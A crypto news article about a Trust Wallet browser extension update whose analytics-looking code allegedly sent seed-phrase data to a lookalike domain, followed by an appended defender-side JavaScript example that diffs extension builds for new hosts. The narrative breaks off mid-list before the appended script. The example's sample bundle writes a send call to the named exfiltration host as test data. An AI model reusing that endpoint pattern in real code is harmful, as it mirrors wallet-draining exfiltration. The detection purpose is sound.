The Update That Drained Wallets
The post The Update That Drained Wallets appeared on BitcoinEthereumNews.com.
What Exactly Happened in the Trust Wallet Incident

Step 1: A New Browser Extension Update Was Released

A new update for the Trust Wallet browser extension was released on December 24. The update seemed routine. No major security warnings came with it. Users installed it through the usual update process. At this point, nothing seemed suspicious.

Step 2: New Code Was Added to the Extension

After the update, researchers looking into the extension’s files noticed changes in a JavaScript file known as 4482.js.

Key observation: This matters because browser wallets are very sensitive environments; any new outgoing logic poses a high risk.

Step 3: Code Masqueraded as “Analytics”

The added logic appeared as analytics or telemetry code. Specifically:

- It looked like tracking logic used by common analytics SDKs.
- It did not trigger all the time.
- It activated only under certain conditions.

This design made it harder to detect during casual testing.

Step 4: Trigger Condition — Importing a Seed Phrase

Community reverse-engineering suggests the logic was triggered when a user imported a seed phrase into the extension.

Why this is critical:

- Importing a seed phrase gives the wallet full control.
- This is a one-time, high-value moment.
- Any malicious code only needs to act once.

Users who only used existing wallets may not have triggered this path.

Step 5: Wallet Data Was Sent Externally

When the trigger condition occurred, the code allegedly sent data to an external endpoint: metrics-trustwallet[.]com

What raised alarms:

- The domain looked a lot like a legitimate Trust Wallet subdomain.
- It was registered only days earlier.
- It was not publicly documented.
- It later went offline.

At the very least, this confirms unexpected outgoing communication from the wallet extension.

Step 6: Attackers Acted Immediately

Shortly after seed phrase imports, users reported:

- Wallets drained within minutes.
- Multiple assets moved quickly.
- No further…
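
A defender-side check for the risk described in Steps 2 and 5, as an added example that is not from the article or from Trust Wallet: it compares the hosts referenced in two builds of an extension and flags new ones that fall outside an allowlist. The allowlist, the sample bundles and every hostname except the article's defanged indicator are assumptions constructed for illustration.

```javascript
// Added example (not the article's or Trust Wallet's code).
// Assumption: the vendor's documented registrable domains and brand string.
const ALLOWED_DOMAINS = ["trustwallet.com"];
const BRAND = "trustwallet";

// Turn a defanged indicator such as "a[.]b" back into a hostname for matching.
const refang = (s) => s.replace(/\[\.\]/g, ".");

// Constructed sample bundles standing in for the unpacked .js files of two
// consecutive extension versions. The subdomains are made up; the last host
// is the indicator quoted in the article.
const OLD_BUNDLE = 'fetch("https://api.trustwallet.com/v1/assets");';
const NEW_BUNDLE = `${OLD_BUNDLE}
send("https://telemetry.trustwallet.com/e", evt);
send("https://${refang("metrics-trustwallet[.]com")}/collect", evt);`;

// Collect hosts from literal http(s) URLs. Endpoints assembled at runtime are
// missed, so pair this with network monitoring of the running extension.
function extractHosts(source) {
  const hosts = new Set();
  const re = /https?:\/\/([a-z0-9-]+(?:\.[a-z0-9-]+)+)/gi;
  for (const m of source.matchAll(re)) hosts.add(m[1].toLowerCase());
  return hosts;
}

// A host is allowed only if it is an allowlisted domain or a subdomain of one.
function isAllowed(host) {
  return ALLOWED_DOMAINS.some((d) => host === d || host.endsWith("." + d));
}

// Report every host that is new in this build, with two review signals.
function reviewUpdate(oldSrc, newSrc) {
  const before = extractHosts(oldSrc);
  const findings = [];
  for (const host of extractHosts(newSrc)) {
    if (before.has(host)) continue;
    const allowed = isAllowed(host);
    // Lookalike: carries the brand string but sits outside the vendor's domains.
    const lookalike = !allowed && host.replace(/[^a-z0-9]/g, "").includes(BRAND);
    findings.push({ host, allowed, lookalike });
  }
  return findings;
}

console.log(reviewUpdate(OLD_BUNDLE, NEW_BUNDLE));
```

A finding with `lookalike: true` is the case to hold a release or an install on until the host is explained.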
Filed under: News - @ December 25, 2025 11:20 pm